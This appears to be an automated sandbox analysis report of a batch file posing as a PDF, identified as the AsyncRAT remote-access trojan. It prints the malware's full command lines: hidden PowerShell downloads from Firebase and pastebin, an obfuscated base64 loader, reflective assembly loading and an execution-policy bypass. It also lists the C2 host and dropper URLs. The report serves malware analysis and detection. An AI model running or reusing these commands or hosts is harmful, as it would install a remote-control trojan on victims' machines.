Overview

overview

10

Static

static

1

fv64545845...df.bat

windows7-x64

10

fv64545845...df.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    303s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    23-07-2024 17:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fv645458456550656894659461646_Pdf.bat

  • Size

    28KB

  • MD5

    54c9e929aa6ea3e1e5957f9b0aee4e69

  • SHA1

    2c6e7d48b6951f59c4fcddfeb65b0e07e96394ac

  • SHA256

    c210d65973ad42a433a440c7716e92631c14ea6614f628ed0c540fae3b54e991

  • SHA512

    a075910c9707f49a9ffa6673ab2eb29ff3e0c2cabbb521ad7101c999f50bc7bd75b6e49eaa8d7f3d9db109c06bdbb56980b46317a23ed5d7d87dcacdd0e1ce2b

  • SSDEEP

    12:3xzJZ+O2P5g0it981k771o3tkRXFOuHeTgQ1tgQzu0:3x2P5g0i/7ZetYV7QEQzu0

Score
10/10
asyncratdefaultdiscoveryexecutionpersistencerat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://firebasestorage.googleapis.com/v0/b/documentos-1b4a9.appspot.com/o/2207.vbs?alt=media&token=29f70419-a771-4403-90c3-30dc64c96114

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://pastebin.com/raw/V9y5Q5vv

Extracted

Family

asyncrat

Version

| CRACKED BY https://t.me/xworm_v2

Botnet

Default

C2

asyn8097.duckdns.org:8097

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fv645458456550656894659461646_Pdf.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://firebasestorage.googleapis.com/v0/b/documentos-1b4a9.appspot.com/o/2207.vbs?alt=media&token=29f70419-a771-4403-90c3-30dc64c96114', 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2100
    • C:\Windows\system32\wscript.exe
      wscript "C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J☼B2☼HU☼dQBj☼HQ☼I☼☼9☼C☼☼Jw☼w☼DE☼Jw☼7☼CQ☼dQB0☼Gc☼awBu☼C☼☼PQ☼g☼Cc☼JQBw☼Ho☼QQBj☼E8☼ZwBJ☼G4☼TQBy☼CU☼Jw☼7☼Fs☼UwB5☼HM☼d☼Bl☼G0☼LgBO☼GU☼d☼☼u☼FM☼ZQBy☼HY☼aQBj☼GU☼U☼Bv☼Gk☼bgB0☼E0☼YQBu☼GE☼ZwBl☼HI☼XQ☼6☼Do☼UwBl☼HI☼dgBl☼HI☼QwBl☼HI☼d☼Bp☼GY☼aQBj☼GE☼d☼Bl☼FY☼YQBs☼Gk☼Z☼Bh☼HQ☼aQBv☼G4☼QwBh☼Gw☼b☼Bi☼GE☼YwBr☼C☼☼PQ☼g☼Hs☼J☼B0☼HI☼dQBl☼H0☼OwBb☼FM☼eQBz☼HQ☼ZQBt☼C4☼TgBl☼HQ☼LgBT☼GU☼cgB2☼Gk☼YwBl☼F☼☼bwBp☼G4☼d☼BN☼GE☼bgBh☼Gc☼ZQBy☼F0☼Og☼6☼FM☼ZQBj☼HU☼cgBp☼HQ☼eQBQ☼HI☼bwB0☼G8☼YwBv☼Gw☼I☼☼9☼C☼☼WwBT☼Hk☼cwB0☼GU☼bQ☼u☼E4☼ZQB0☼C4☼UwBl☼GM☼dQBy☼Gk☼d☼B5☼F☼☼cgBv☼HQ☼bwBj☼G8☼b☼BU☼Hk☼c☼Bl☼F0☼Og☼6☼FQ☼b☼Bz☼DE☼Mg☼7☼Fs☼QgB5☼HQ☼ZQBb☼F0☼XQ☼g☼CQ☼dgBx☼GE☼dQBx☼C☼☼PQ☼g☼Fs☼cwB5☼HM☼d☼Bl☼G0☼LgBD☼G8☼bgB2☼GU☼cgB0☼F0☼Og☼6☼EY☼cgBv☼G0☼QgBh☼HM☼ZQ☼2☼DQ☼UwB0☼HI☼aQBu☼Gc☼K☼☼g☼Cg☼TgBl☼Hc☼LQBP☼GI☼agBl☼GM☼d☼☼g☼E4☼ZQB0☼C4☼VwBl☼GI☼QwBs☼Gk☼ZQBu☼HQ☼KQ☼u☼EQ☼bwB3☼G4☼b☼Bv☼GE☼Z☼BT☼HQ☼cgBp☼G4☼Zw☼o☼C☼☼K☼BO☼GU☼dw☼t☼E8☼YgBq☼GU☼YwB0☼C☼☼TgBl☼HQ☼LgBX☼GU☼YgBD☼Gw☼aQBl☼G4☼d☼☼p☼C4☼R☼Bv☼Hc☼bgBs☼G8☼YQBk☼FM☼d☼By☼Gk☼bgBn☼Cg☼JwBo☼HQ☼d☼Bw☼Do☼Lw☼v☼H☼☼YQBz☼HQ☼ZQBi☼Gk☼bg☼u☼GM☼bwBt☼C8☼cgBh☼Hc☼LwBW☼Dk☼eQ☼1☼FE☼NQB2☼HY☼Jw☼p☼C☼☼KQ☼g☼Ck☼OwBb☼HM☼eQBz☼HQ☼ZQBt☼C4☼QQBw☼H☼☼R☼Bv☼G0☼YQBp☼G4☼XQ☼6☼Do☼QwB1☼HI☼cgBl☼G4☼d☼BE☼G8☼bQBh☼Gk☼bg☼u☼Ew☼bwBh☼GQ☼K☼☼k☼HY☼cQBh☼HU☼cQ☼p☼C4☼RwBl☼HQ☼V☼B5☼H☼☼ZQ☼o☼Cc☼QwBs☼GE☼cwBz☼Ew☼aQBi☼HI☼YQBy☼Hk☼Mw☼u☼EM☼b☼Bh☼HM☼cw☼x☼Cc☼KQ☼u☼Ec☼ZQB0☼E0☼ZQB0☼Gg☼bwBk☼Cg☼JwBN☼HM☼cQBC☼Ek☼YgBZ☼Cc☼KQ☼u☼Ek☼bgB2☼G8☼awBl☼Cg☼J☼Bu☼HU☼b☼Bs☼Cw☼I☼Bb☼G8☼YgBq☼GU☼YwB0☼Fs☼XQBd☼C☼☼K☼☼n☼DY☼N☼Bh☼DE☼ZQBm☼DQ☼M☼Bh☼GE☼YgBk☼C0☼YQBh☼GY☼O☼☼t☼DE☼MgBm☼DQ☼LQBj☼Dc☼Zg☼2☼C0☼N☼Bj☼DI☼NwBj☼DM☼Mg☼1☼D0☼bgBl☼Gs☼bwB0☼CY☼YQBp☼GQ☼ZQBt☼D0☼d☼Bs☼GE☼PwB0☼Hg☼d☼☼u☼E4☼WQBT☼EE☼LwBv☼C8☼bQBv☼GM☼LgB0☼G8☼c☼Bz☼H☼☼c☼Bh☼C4☼OQBh☼DQ☼Yg☼x☼C0☼cwBv☼HQ☼bgBl☼G0☼dQBj☼G8☼Z☼☼v☼GI☼Lw☼w☼HY☼LwBt☼G8☼Yw☼u☼HM☼aQBw☼GE☼ZQBs☼Gc☼bwBv☼Gc☼LgBl☼Gc☼YQBy☼G8☼d☼Bz☼GU☼cwBh☼GI☼ZQBy☼Gk☼Zg☼v☼C8☼OgBz☼H☼☼d☼B0☼Gg☼Jw☼g☼Cw☼I☼☼k☼HU☼d☼Bn☼Gs☼bg☼g☼Cw☼I☼☼n☼F8☼XwBf☼F8☼XwBf☼F8☼XwBp☼Hk☼YgBi☼HU☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼LQ☼t☼C0☼LQ☼t☼C0☼LQ☼n☼Cw☼I☼☼k☼HY☼dQB1☼GM☼d☼☼s☼C☼☼Jw☼x☼Cc☼L☼☼g☼Cc☼UgBv☼GQ☼YQ☼n☼C☼☼KQ☼p☼Ds☼';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace('☼','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs');powershell -command $KByHL;
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4804
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$vuuct = '01';$utgkn = 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $vqauq = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($vqauq).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('64a1ef40aabd-aaf8-12f4-c7f6-4c27c325=nekot&aidem=tla?txt.NYSA/o/moc.topsppa.9a4b1-sotnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $utgkn , '________iybbu____________________________________-------', $vuuct, '1', 'Roda' ));"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1568
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4052
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3644
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1464
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            5⤵
              PID:784
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:984

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      08f9f3eb63ff567d1ee2a25e9bbf18f0

      SHA1

      6bf06056d1bb14c183490caf950e29ac9d73643a

      SHA256

      82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

      SHA512

      425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      50c200ee95fde62de06d24c46d7f4015

      SHA1

      1a92b50e45b5a1e38b2e6e44b31a261d6e94c51f

      SHA256

      08f235da5be274937370937f5cb665bbc521424cd935661c3a1de572c8880c1f

      SHA512

      1cc2f6c15f60d810462410b889cb57f44d6be0cdef5ccd997bbb605918d7df046c0193bac1df91b5ffe272ee4f456a4b19ff5c998c42241d0673c023358c49e8

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      c6e7e5342ea5ff4e820aa7185e18cb00

      SHA1

      5b0909c5d951389edbfb7129e3fb9e4e2a822b14

      SHA256

      4eea204c7a249f11b31a7a52ef3e1f32ac743d14c52cdce7f8494e10cf4457a7

      SHA512

      25e13c61e262ec4032af7737126928920b2a191dfce22936e1e3a3d229b48617248698c9e0b362864a3d3b5e54abad91728e6d68077e8227703a02660875e8a5

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      ce53a01aa4e625799ddce5aea12dc6a7

      SHA1

      54155939e8b8af62fb3ef78944a55826e3ecd917

      SHA256

      c33f1c987bfc37cef5961e85f2020f181213442342591b40caa98493d3377315

      SHA512

      7e81b075fe04a6a65904771941d22fe84492a4bb0eb48c67b2af8b3ee1516358e55d3ec2c1269340a55cc6326821d0d60568d6057b4088a4258c36fe00c8d86f

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      e3324f3c0f10a96ce82da88885030e92

      SHA1

      d21a65befdf3fd9dc16c362f39bdfdc2f331cf82

      SHA256

      816814e23f89922feea4900759738962760ae600f69e1cfe35e623f7502f3689

      SHA512

      2d0df3b4f5d71bfd2205712d3a06841541d775008958caacd94c92017a04ab0b08fcccb7ad1ea3aa7307529216e88612da3098a06d8de0b176abac1a082246f5

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs
      Filesize

      1.7MB

      MD5

      a958447eb04bdb5f4ecf9ff291884946

      SHA1

      4d5ffda96a16ba7d0df252521ddde378ae6665a7

      SHA256

      aa05cb9b41c6799452c75ce1ec9a6ae20258b6aadbe1a98d7aac234abb188723

      SHA512

      c1f2fc24f33b238a9e3a5f22b3b4e69103b9eda9fff8d8a14984a5754a5c8a231eeb8f5d859563d70eef0aead1cf032c64161bbc143cf39956b4968307b944b3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_crzznrzk.nfn.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\xx1.ps1
      Filesize

      285B

      MD5

      43e71ea1d73d91da070fedd7f1a79998

      SHA1

      d7f3de14ea18eb354188326c9e6483160169c4bc

      SHA256

      f56faa81140b0b2ccdc137a98c84ac9a5c74492a2b5cbd825d8cafa37d2f1ed6

      SHA512

      3e6ff260759be20491a015d5ec45de620d1dd4290700bd0b5aa84e8e985568afa21430c31d2920b02f8e19dc1fe7700536541d83fdc38f6876e0b20cbfb04b56

      Download Submit

    • memory/984-93-0x00000000065B0000-0x0000000006B54000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/984-92-0x0000000005AA0000-0x0000000005B3C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/984-83-0x0000000000400000-0x0000000000416000-memory.dmp

      Filesize

      88KB

      Download

    • memory/984-94-0x0000000006070000-0x00000000060D6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/984-95-0x0000000006300000-0x0000000006402000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/1464-65-0x0000017C60AC0000-0x0000017C60CDC000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/1568-86-0x0000026765D90000-0x0000026765FAC000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/1568-41-0x0000026765BD0000-0x0000026765BEE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1568-42-0x0000026765BF0000-0x0000026765BF6000-memory.dmp

      Filesize

      24KB

      Download

    • memory/1568-82-0x0000026766130000-0x000002676613A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2100-15-0x00007FFC9D830000-0x00007FFC9E2F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2100-19-0x00007FFC9D830000-0x00007FFC9E2F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2100-0-0x00007FFC9D833000-0x00007FFC9D835000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2100-14-0x000001747AEE0000-0x000001747AFE2000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/2100-13-0x00007FFC9D830000-0x00007FFC9E2F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2100-12-0x000001747A1D0000-0x000001747A1E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2100-1-0x000001747A390000-0x000001747A412000-memory.dmp

      Filesize

      520KB

      Download

    • memory/2100-2-0x000001747A1E0000-0x000001747A202000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3644-78-0x000001E5DC5E0000-0x000001E5DC7FC000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/4052-81-0x000001DFEE3A0000-0x000001DFEE5BC000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/4052-63-0x000001DFEE280000-0x000001DFEE28A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4804-89-0x000001D098810000-0x000001D098A2C000-memory.dmp

      Filesize

      2.1MB

      Download